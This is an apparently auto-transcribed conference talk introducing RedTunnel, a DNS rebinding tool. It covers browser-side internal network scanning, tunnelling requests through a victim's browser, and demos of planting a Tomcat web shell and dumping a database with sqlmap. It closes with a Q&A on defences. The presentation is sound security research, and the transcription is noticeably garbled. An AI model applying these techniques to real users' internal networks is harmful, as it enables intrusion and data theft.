Hidden Networks Pivoting: Redefining DNS Rebinding Attack

hello good morning it's great to see a full room for day two round day two ground floor at besides tenth tenth conference in Las Vegas a few announcements as usual before we begin just a reminder we are live-streaming cell phones off if you have questions come to the microphone and as always we'd like to thank our sponsors especially our inner circle he needs circle sponsors critical stack and the Malon mail as well as stellar sponsors blackberry Microsoft and the paranoids so talk is on hidden networks parading please welcome Tom ersite and Nimrod levy okay thank you very much like I said my name is Tom Versailles and this is Nimrod levy will show you the hidden

network pivoting using the redefining DNS rebinding attack we call the tool red tunnel but you will see all the concept behind it so my name is Dahmer site I'm a security researcher the f5 networks and I am CTF into a history you can see some CDF's I'm also a CTF developer in besides dlv and also OS by L and I was and I'm an open source developer and that's it to talk about me now a Nimrod everyone my name is Ahmad Levin I am the CTO and co-founder at scorpianas I'm here to talk to you about DNS rebinding automation and it dude that we developed called red tunnel in my daily walk I perform research on

various technologies conducting operations and give back to the community by developing open source tools so how did this research begin as a part of our community contribution we have the developers at beside TLV CTF and last year we developed a challenge called can you bypass the soap the feedback from this the the challenge was based based in DNS rebinding vulnerability of course and the feedback was the exploitation process is is complex so tom and i then think and think how we can make this process simplify and build a red tunnel tool then we presented the tool at besides TLV and like a taja last year and we will present it again in the upcoming blackhat USA and of course here

before we talk about the red tunnel we need to first understand some basic concepts the first concept we discuss will be same origin policy followed by cross-origin resource sharing and then some DNS caching basics so same origin policy is a browser and forced restrictions that prevent your domain from accessing resources that are not compatible with some origin policy checks same origin policy checks include that your domain had has the same schema hostname and port if one of the check fails your request will be blocked by the same origin policy in this example you can see that evil comb is trying to it will the Lucifer file the request will be allowed because evil there is

not violation for the same origin policy but if evil comb will try to get a resource from good call the rich request will be blocked because of that evil kamma is not allowed to get access to good cop but what if evil.com actually won't get access to good cop we can do that in this case the cross-origin resource sharing comes to the rescue cross-origin resource sharing is the mechanism that use HTTP headers to tell the browser how to deal with outgoing objects requests to a different origin in this example you can see that evil comm is trying to get access to good comm that we with a request will be permitted because you can see that there

is header called access control allow origin that permit access to evil.com in some situations the browser will trigger a pre-flight request before if you try it will try to send the simple request a pre-flight request is HTTP request that issued 302 a main cost HTTP headers under certain conditions such as method with a special method get a board put delete chat widget etc the browser first send an optional request to to ensure whether evil comm can perform operations with good calm and if is not the request will be blocked if it is the request the next request will be the actual request with all the power methods in this example you can see that evil comm is

trying to access good comm with 30 own conditions you can see that by dimension headers such a turret cetera there is rules that you can read in in google but unfortunately the request will be blocked because good comm does not permit access to evil.com for that the request will be rejected by the browser and will not send the actual requests no let's talk a little bit about DNS and DNS cache please take a look in the following DNS response bar you can see that the hostname is translation at Ossining trans the translation is directed to the localhost address you can see also that the time to live is 152 seconds it's mean that the local DNS

cache will store the record for 156 2 seconds now let's see how its look on a Windows machine first of all we will ping our server which will trigger a DNS request the DNS response will be translated to the localhost address then we will update the direct call to 1 3 3 7 IP with our DNS server it will be used with the cloud fair for this example but you can see that there is still 24 seconds left before the caches expires

ok ok when the cache it expires on Don we wait for the command ok when the caches expires you can see that the local DNS cache is empty now we will send a new DNS request by standing a ping this in turn will trigger of course a new DNS request and the DNS response will will resolve the new IP and map the hosts them to the 127 IP now let's see how it works the victim computer ask a send a request to evil.com which goes to our DNA the DNS server will resolved our my malicious server IP next the browser will issue a get request to the result server IP and execute the following malicious JavaScript code the JavaScript

code will halt itself until the evil comm HTML title is changed what the title is change that I can know that what has happened that I can know that the rebinding process was successful when the script call itself the our DNS server will change the IP assignment to another internal IP and once the local DNS cache is renewed and populated with the new IP that I can have access to the resource can send requests to the host and take and compromise internal assets

so let's about let's talk about the area before retinyl what happened with the DNS rebinding because it's a ten-year-old attack that is still exist in the wild so before a tunnel we'll see what happened to the DNS rebinding tools so the deal for the DNS rebinding tools to work you needed to gain information about the victim you can't attack we're using DNS rebinding without knowing the IP addresses that you are going to attack you needed to use scripts different scripts to scan the network to understand that those ports are to find the hosts and to understand that those ports that you found in the scanning process are HTTP ports because if it's not you cannot attack using DNS

rebinding and then after you have all this information you needed to create scripts in a Vence to attack those internal assets you need to use scripts that attack the router or the internal application but it will be only using to attack one application at a time you cannot create something that will be granular and will work on every application in the world so let's talk about the disadvantages of this process so you need information about the user about the internal assets it's and this information is really hard to get you really need to find a way to get the internal IP addresses to find what applications they have because if you don't know the applications you are

going to attack you cannot use those automatic scripts to find that attack the attack for you ok and now it's hard to configure that those tools are really hard to configure if they have a configuration not all these tools has a configuration and if it has a configuration sometimes is a code configuration so when you need to understand how to code in order to configure the application the scanners are mostly slow because they use only time out attacks to find the internal assets to understand if this IP is exist or not exist and never knows if the port is open and the port is each HTTP port before it start the rebinding process there is no victim management for most

of those so if there is no victim management you will forget some of the victims and you will not be able to gain information from the server those victims and to execute the attack like SQL injections on the internal applications let's don't say SQL injection because with the all tools you cannot use SQL injection on an application that you don't know if it's an internal application that someone just developed on the his local machine you cannot attack this application using SQL injection so the power loads are limited it's just for known tools for known assets for known applications so they are really limited for scripts that the community created and you cannot attack manually if you want to just see

the application in your own eyes and to understand okay there's a basic authentication mechanism maybe I will use this basic authentication I will brute force this basic authentication mechanism I will find the username in password and we'll just get an access to the application even if it's Tomcat it's really hard to do those scripts to create those scripts manually using javascript and then use the DNS rebinding tools and you can't automatic use automatic tools like SQL map but we want to use SQL map to gain access to the database and then drop all the tables and get the information to dump dump all the tables and get information about the users and passwords and everything in database so we can't do it

in the old tools so this is the thing that retinal give you it will give you the option to use all those features that you can could not use in the or tools in a new manner so let's see how it works this is the automatic process of retina retinal we get internal IP address for now it won't work on the version of chrome 75 and so on because they fix it now you cannot get internal IP address using WebRTC but we still using another techniques we'll add them on to the next version that will fast between IP addresses that we know that could be in the internal network to understand if this network exists that there's an IP

address like 120 to 168 1 1 and if this IP address exists that means that we can scan this network to the 1200 and 55 IP addresses and then find the internal assets find the port and exploit the applications so we will scan for the internal hosts then after we found the internal hosts we'll try to scan for open HTTP ports we use our own JavaScript reconnaissance scripts some of them use timeouts some of them use events in the domain elements but they're all very accurate we check it a lot before we publish the code in github of course and it will bypass browser limitations so in your browsers you cannot use script that will

just show you that there's basic authentication behind the scenes behind the asset when you send request to web page you either send the credentials in advance or you just send the credentials in the URL but in the newer version of the browsers you cannot live you cannot use the old mechanism of sending the username and password inside the URL but only one one function allows it and it's the regular attacks request so we use it to send an object's request with bad credentials and then we know that there's a basic authentication behind the scenes that showed us that those credentials are wrong but in the next time you will be able to insert the right credentials so we automate the

whole it will automate the whole DNS rebinding process inside the red tunnel script it will tunnel through victims to the internal network that means that you can actually surf on the internal network asset like the router you just click on the link and you see the router like it was in the DMZ it's not but we have our own scripts and our own features that allows us to just surf the web in the internal network like it was in the DMZ then you will be able to manage everything all the attacks and all the victims in one single page with all their assets so let's talk about retinol and see how it works so this is

the architecture of retinol you can see we have the core application the core application is the malicious web application it's also the command and control center that you can see the attacker can see all the assets of the victims but it also attacked the the client so the client open a web application I just open a link in our demo we will see it will be soul eater again because game is less longer and as long as people are in specific web page you will be able to gain more information and to attack more assets okay so they click on a link they just forget about it the link is then translated to the core application the

core application understand that the DNS rebinding process should be started and it will talk to the DNS to change the IP address like you saw in the Nimrods demo so then after the DNS address changed you will get back to the core application and the attacker will be able to use the core application to get access to the internal assets so how we really create a proxy from the user that serve to the web from the victim browser that was I will talk about now so we have a client JavaScript proxy but how it works you cannot just send requests to the victim browser you just can't even if you know the IP address the victim

browser is still the victim browser it can send requests directly from the victim browser from the attacker to the internal assets but what you can do you can use a malicious app in the middle that will translate the web page to the attacker from the victim browser and this is one of the best features we have on retina it will allow you also to send requests like post put delete batch and every other request that you could not do in the old tools so now I will talk about how it works you will see everything in the code like I said it's all open source so to do so to be able to gain information to gain and access

to the internal web applications the first the victim need to click on the link and on this link there is a malicious web application and the malicious web application just create using javascript WebSocket connection with the malicious web application it's still the same web application with WebSocket and also with the HTTP now the attacker sent requests to the internal the malicious web application with the internal web application web application information like here you can see the IP address but you can still say it's the same is the same domain it's still evil calm but the sub domain will get it will will have information about victim like the victim ID or and the victim IP address and the victim

port because in one victim will have many IP addresses because there's full internal network behind it and also there's lots of ports because in one in one host you will have many ports and maybe some of them are HTTP ports so you need this information in order to get the right response from the right web application and I did not write it but to talk with many assets in the same web application we created iframe it's really ordered to to get the information from as many web application as we can and to do it as in chrony ously so we have iframes and we connect to those iframes with web messaging so now we have the mechanism of how we can send

requests but let's see the real request so we send a request to the malicious web application but how we can get the information we need from the web application the internal web application in the victim browser network from the malicious web application so the malicious web application has a responses dictionary and it will save the response object we're using nodejs it is possible to create a global response object that will have a key value pairs responses and also we can just create a time out mechanism to sit a time out when the response is timed out just if we waited for ten seconds and the response never ever came we can just set a time out mechanism

that will respond with time out so now there were a malicious web application we'll send a push message to the WebSocket in the victim browser with a unique identifier and the all requests information here I just showed you the URI but and the method but you will see also data and another good information about like we will see the credentials for basic authentication and you will see also the headers and you customized headers that we want to send in the request from the browser to the internal assets that already rebinding using retinal and the dns remaining now after the victim browser responded with another push of message using WebSocket to the web malicious web application you

will see the same identifier but now you will see the headers of the response and also the data the body of the response that will come back to the user and now the attacker and the malicious web application finds the right response and just respond using send function and returning the response with all the headers even where basic authentication headers and with all the information and with all the body of the response to the attacker even if it's binary files the attacker will be still be able to download those binary files using the same technique so as I said you can find the retinal code yes source code here in a github github slash written and now I

will talk about the easy part why it it why is it so easy it's it seems so so hard to set up all these things like you need a DNS server and you need the core application and you need the database and you need everything it's it's not that that's hard you can just use docker - docker compose up - T because we want it to be with the daemon and then you will have the DNS server the core application and also the database in the same server then you need to register a domain so you need a domain we chose this freedom because freedom has just three domains and now when you have the domain you can

just insert the name server so the name server is actually the web application that you have but you say ok I don't have a sub domain called NS dot retinyl dot 0 dot the CEO to yellow dot email or whatever domain you have yes you don't have but for that you can use a glue records so with glue records you will have like an internal host file you create IP that will be translated to subdomain though it will it will not go to the to the DNS server at all it will just be translated translated immediately so that way you will be able to create the name servers and then you will be able to

use them so now you just need to set your admin credentials and you're good to go so now I will show the demo I hope that the mall is longer I think I done it's a little bit fast so I will show the demo then you ask your questions I will try to pray to the demo gods because it's a live demo and the last time I prayed it didn't work so maybe now after I sacrifice Nimrod so let's see this is the internal the way this this is retina this is the web application I know I can say okay so this is Retta you can see red tunnel here and you can see that

somebody tried to connector I don't know I don't know why it's not a good idea people it's really if you don't want your intel on network TV hours don't do it good choice so so now i will connect to the RDP again because there it's all messy okay so this is their remote desktop and we'll open written link it's just a solitaire game can see it's a regular solitaire game and Jeff soul eater I hope the internet works if not I will use my my phone for that let's see yes I'm connected

just in advance try to use this I also have recorded demo because I don't trust the Democrats but I want to show it in real time

so let's use the phone instead okay it works here is the solitaire and now it started the whole retinal process so now it scanned for the host you can see it out here second it's little bit bigger than it was when I try this demo okay so you can see it scanning the network there's an iframe and you'll see oh it's already started refresh now it just stopped I grew up like frames so we can see hall requests going here's being pulled here is the requests you can see request going so now it's scanning for parts I will tell you why I chose a soul eater it's a really funny story I thought about using pac-man or Mario but then I

thought but I can lose and I'm a gamer and it won't look good if I lose in Mario so I chose the game that I don't need to do anything in order to play so I just make it stay that way and that's it and now it's scanning for the hosts will see when it's it will be finished for a few seconds here is the hosts now you see the popped up basic authentication this is a mekinese mechanism that would create it in order to get responses from basic authentication hosts if there is a host with a port that behind this point there is a multiplication with basic authentication we still need to gain information that it is a web application

with basic education so we have some ways in order to get these knowledge so we found all the hosts and now we searched for the ports and as it considers ports in the the local host and there's ports in other assets like 8080 in another IP address in the inside the network and 80 and another assets still 80 on another asset and now we'll see what sacker see when all this information gets to the attacker so see I was just very first if age because the internet wasn't that good

okay now the DNS rebinding process finished so we can just see everything in the attacker webpage they can command and control I will do it for another minute and if it won't work I will just show the video that we created before the condition

[Music] oh sure so here's the attacker perspective so here we have lots of information that we got from the user we have the assets that we remind it and we of course the internet just disconnected us so I'll try to do it before it will disconnect us a once more so now what we can do is we can just go to those assets thus explore those assets and see the web applications behind it so here we can see that inside the the user the victim had an internal web application a simple HTTP server with Python and in this simple HTTP servers he had a directory listening so now we can just download binary files from the

internal web application just by clicking on a link that's it we just see the web application you can those binary files and now I see that it's really really really really slow so I will just go to the recorded demo I am sorry because I don't want you to wait for internet e it's like you want to pee and just need to hold it Oh cool but our guys really don't like me I will just reopen the presentation

okay let's go demo screw you once again demo guts haha I want okay so now they'll see the same thing but with a record the demo I'm sorry it's too slow and I can't handle it my heart is really pumping right now so here is the demo and we just scan for the hosts and for the ports in the assets of the victim so the victim opened a solitaire game and now we're just creating filters for the logs of the retinal because red tunnel is in debug mode and it will almost ever be in debug mode because it's still in the development stage it's still beta alpha or whatever it's an open source application who cares

so now we'll get the holiday host and the internal hosts in the internal network as you can see and after live and after that you will see their internal parts it will scan for the internal parts this is a mass this is a short process because we already have all the hosts and we have a configure parts and now it will rebind to every port you can see in the internal parts that it found so it will start the rebinding process right now and we should see the whole new host that was created with a random string for every internal host and port and user victim you should see it right now and just fast-forward

okay you can see it right there I am because maybe you missed it here's all the reminded internal hose and parts and now we just have the commanded control center it's the same application that they use ik used in order to get the attack started and as you can see we just clicked on the binary file and we saw the response here we will see another web application inside the network I will I just want to show you before I finish the presentation you can see here that every sub domain has information about the user so you can automate using your tools you just need the cookie the red tunnel cookie because we are still

security people so we don't want anybody to gain access to the internal web applications of another victim we just want it to be ours so there's a security cookie so this is the IP address you will use the IP address in every retinal link this is the port and this is the ID the unique identifier that every user has on the local storage so now we will see that you can we can actually use basic authentication like it the application was in the Internet in the DMZ so we can just use Tomcat find tomcatting the internal network now use Tomcat - ok sorry just insert the credentials to Tomcat using basic authentication in our own

attacker web browser and we have control on the management of tonkin but it's not enough we can just use another techniques like using an old exploit that uses the put method in order to create new pages in Tomcat and we just will have a web shell so this is another demo of what we can do with using just read tunnel in everything ok so we use the shell and now you will see that we can also use retinol with automatic tools like SQL map so we'll see the dvwa application is vulnerable web application with lots of abilities will check the SQL injection vulnerability here in dvwa we'll just set user I did one we'll take the response because we

still need the cookie the retinal cookie will serve it side [Music]

you can see the whole response here with the cookie will open CMD or here's his PowerShell although I had PowerShell but still it was the faster option now we just execute the SQL map command with the request file and it will find that we have my sequel database here of course will tell it yes it's my sequel don't try another database and now it will find the attack vector generic Union so still yes don't waste your time we know the attack vector and you should see right now that it started to get the attack started the SQL injection attack and it knows that the ID parameter is vulnerable and now it founds the right amount of columns

and it found a user table and if we click once more time one more time you can see the whole database dumped in front of our eyes so you can use automatic tools in the internal assets of someone just using rhythm it was never existed in the wild not officially of course I think we are not the first ones to create as tools but it's so simple that anybody could use the NS rebinding attack everywhere without knowing anything about the victim and so I want to tank max rank for the logo for stickers so thanks to max - Max and also Dima Bielski for the UI this is it the only way that the UI was will

look like a UI and not like a drawing of a ten year old boy if I create a DUI so thanks Dima and now we have time for questions anyone how do you pick the subnets to scan and is could you make that threaded so it scans a little faster it looks like one a second per IP so it smoothly threaded yes it's it's multi-threaded I cannot use more than eight threads in Chrome the problem is that Chrome has a limitation of threads he has its own Q and this Q will expire some of the requests if it's not executed in the in the right time so we used a library we created called J's

spool like in python pool you have pool of threads you tell it how many threads you want so here we use 10 threads maybe in Firefox we can use more threads but it still doesn't work on Firefox and we just create a requests and it's with promises so we know the requests executed and returned so we can populate with another request and another so it's really fast it's not faster than a regular scan because you don't have this cue that Chrome has and you don't have this problem and we tried to bypass this problem using web workers and iframes and stuff it didn't work so it's still using this this library query created called chess pool we can you can

just check it out it's in the same project and it's it's still really fast it's something like one minute the whole DNS rebinding process for an internal entire internal network between one to two minutes it's the faster you will get the Internet believe me I so many tools ok this was difficult to see from the back where any of the services you exploited on the internal network SSL enabled no no of course it's it's one of the ways you can protect from DNS rebinding exploitation so if you want to protect against DNS rebinding as a cell if you don't have a board that has SSL termination off or something like you can just check that this spot will not

verify like it's a selenium do it by default for most of the web browsers because they don't want to check their cell because you know when you create an internal web application their cell is just custom built a cell science cell scientist cell certificate so you can just send request those web applications and you will not see the errors that chrome shows when checks this cell and it fails but in other type of clients like the regular clients real people not but you will not be able to send requests to the internal assets that use the cell because would you change the host payment even this change will make this cell fail and then you

will not be able to get response so this is one of the protection mechanism you can see use you can also create one host for every web application and if you use another host it will just thank you very cool ok another question thank you very much um I had a question from the defense side sure on the whole system would you see this chrome doing all these or would you see like sickle mob spawning up or I'll like nmap or other those that you would use yeah you will see chrome but if you sequel map uses the sequel map a now you will see chrome a you cannot change the user agent from from from a

JavaScript so we use just see chrome so you just see chrome doing all this yeah and you just probably see later on creating video connections and stuff like that yes ok using X

so just for just for clarification I say you got the internal DNS server running within your my wire but wouldn't a DNS server just be able to filter a request that comes back from an RFC 1918 address wouldn't that be a way to kind of stop the rebind attack or is that something you did with your your internal DNS sir yes you're right you can just filter those requests there's a few ways to bypass it like you ordering the priority of the request so one request one DNS one address will get a lower priority than the other and then it will just mingle between those requests but still I don't think it's a good idea because

you have an internal assets and those internal assets has an internal IP addresses so I don't think you can really use this mechanism to protect against DNS rebinding attack when you have internal web application inside your network they will use the same IP addresses so it's not really a good idea to do it unless you have a customized DNS server and you can just customize the internal web applications to have the same DNS but with subdomains of the same DNS it will be much easier yeah to protect another question okay so thank you [Applause]